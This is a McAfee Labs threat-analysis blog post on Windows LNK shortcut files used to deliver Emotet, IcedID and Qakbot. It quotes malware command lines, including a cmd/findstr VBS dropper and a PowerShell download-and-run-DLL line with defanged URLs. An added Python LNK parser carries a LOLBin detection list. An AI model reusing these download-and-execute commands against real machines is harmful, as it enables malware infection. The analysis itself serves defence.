Authored by Lakshya Mathur
An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click "Create shortcut" option, or they are sometimes created automatically while running an application. There are also many tools available to build LNK files, and many people have built "lnkbomb" tools specifically for malicious purposes.
During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of use of LNK files to deliver malware such as Emotet, Qakbot, IcedID, Bazarloader, etc.
In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.
Below is a screenshot of how these shortcut files look to a normal user.
LNK THREAT ANALYSIS & CAMPAIGNS
With Microsoft disabling Office macros by default, malware actors are now improving their lure techniques, including exploiting LNK files to achieve their goals.
Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.
We will go through three recent malware campaigns, Emotet, IcedID, and Qakbot, to see how dangerous these files can be.
In Figure 4 we can see the lure message and the attached malicious LNK file.
The user is infected by manually opening the attached LNK file. To dig a little deeper, we look at the properties of the LNK file:
As seen in Figure 5, the Target field shows that the LNK invokes the Windows Command Processor (cmd.exe). The target path shown in the properties is only visible up to 255 characters. However, command-line arguments can be up to 4096 characters, so malicious actors can take advantage of this and pass in long arguments, as they will not be visible in the properties.
In our case the argument is /v:on /c findstr "glKmfOKnQLYKnNs.*" "Form 04.25.2022, US.lnk" > "%tmp%\YlScZcZKeP.vbs" & "%tmp%\YlScZcZKeP.vbs"
Once the findstr.exe utility is given the mentioned string, the remaining content of the LNK file (the script appended after that marker) is saved in a .VBS file under the %temp% folder with the random name YlScZcZKeP.vbs
The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.
The downloaded DLL is then finally executed using the REGSVR32.EXE utility, which is similar in behavior to the Excel (.xls) based version of Emotet.
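As an added illustration (not part of the original post and not McAfee's tooling), the following Python parser walks the Shell Link structure and reports what the Properties dialog hides: the full COMMAND_LINE_ARGUMENTS string beyond 255 characters, use of utilities such as cmd, findstr, PowerShell or MSHTA, and any data appended after the end of the structure, which is where a findstr-extracted script lives. The sample LNK is constructed in code from the Emotet argument quoted above; the flag values and layout follow the MS-SHLLINK specification, and the triage keyword list is an assumption for this example.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORK_DIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")]
LOLBINS = ("cmd", "powershell", "mshta", "wscript", "rundll32", "regsvr32", "findstr")  # assumed list

def parse_lnk(data: bytes) -> dict:
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize (2 bytes) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {}
    for bit, key in [f for f in STRING_FIELDS if flags & f[0]]:   # CountCharacters + chars
        count, pos = struct.unpack_from("<H", data, pos)[0], pos + 2
        enc, width = ("utf-16-le", 2) if flags & IS_UNICODE else ("cp1252", 1)
        out[key] = data[pos:pos + count * width].decode(enc)
        pos += count * width
    while pos + 4 <= len(data):                  # ExtraData blocks, terminated by a size < 4
        size = struct.unpack_from("<I", data, pos)[0]
        pos += size if size >= 4 else 4
        if size < 4:
            break
    out["overlay"] = data[pos:]                  # anything appended after the structure
    return out

def triage(fields: dict) -> list:
    args = fields.get("arguments", "")
    blob = (fields.get("relative_path", "") + " " + args).lower()
    findings = [f"invokes {b}" for b in LOLBINS if b in blob]
    if len(args) > 255:
        findings.append("arguments exceed the 255 chars shown in Properties")
    if "http" in blob:
        findings.append("embedded URL")
    if fields["overlay"]:
        findings.append(f"{len(fields['overlay'])} bytes appended after the LNK structure")
    return findings

def build_sample(rel_path: str, args: str, overlay: bytes = b"") -> bytes:
    # Constructed test file (not a real sample): header, empty IDList, StringData, terminal block.
    flags = HAS_ID_LIST | HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(0x4C - 24)
    s = lambda t: struct.pack("<H", len(t)) + t.encode("utf-16-le")
    return header + struct.pack("<H", 2) + b"\x00\x00" + s(rel_path) + s(args) + bytes(4) + overlay
```

Run `parse_lnk` on a real shortcut read from disk and feed the result to `triage`; the overlay bytes can then be saved for inspection instead of being executed.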
This attack is a perfect example of how attackers chain the LNK, PowerShell, and MSHTA utilities to target their victims.
Here, the PowerShell LNK has a highly obfuscated parameter, which can be seen in Figure 8 in the Target part of the LNK properties.
The parameter is exceptionally long and is not fully visible in the Target field. The whole obfuscated argument is decrypted at run-time and then executes MSHTA with the argument hxxps://hectorcalle[.]com/093789.hta.
The downloaded HTA file invokes another PowerShell that has a similar obfuscated parameter, but this one connects to the URI hxxps://hectorcalle[.]com/listbul.exe
The URI downloads the IcedID installer 64-bit EXE payload under the %HOME% folder.
This attack shows us how attackers can directly hardcode malicious URLs to run with utilities like PowerShell and download critical threat payloads.
In Figure 10 the full Target field argument is "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr"
When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command, and the downloaded file is saved under the %temp% folder with the name test.dll
This is the main Qakbot DLL payload, which is then executed using the rundll32 utility.
As we saw in the above three threat campaigns, attackers abuse Windows shortcut (LNK) files and make them extremely dangerous to ordinary users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim's machine. Malicious LNKs are generally seen using PowerShell and CMD, through which they connect to malicious URLs to download malicious payloads.
We covered just three of the threat families here, but these files have been seen using other Windows utilities to deliver different kinds of malicious payloads. These types of attacks are still evolving, so every user must check LNK shortcut files thoroughly before using them. Users must keep their operating system and anti-virus up to date. They should beware of phishing mail and of clicking on malicious links and attachments.
IOC (Indicators of Compromise)
URLs (Uniform Resource Locators): all URLs blocked.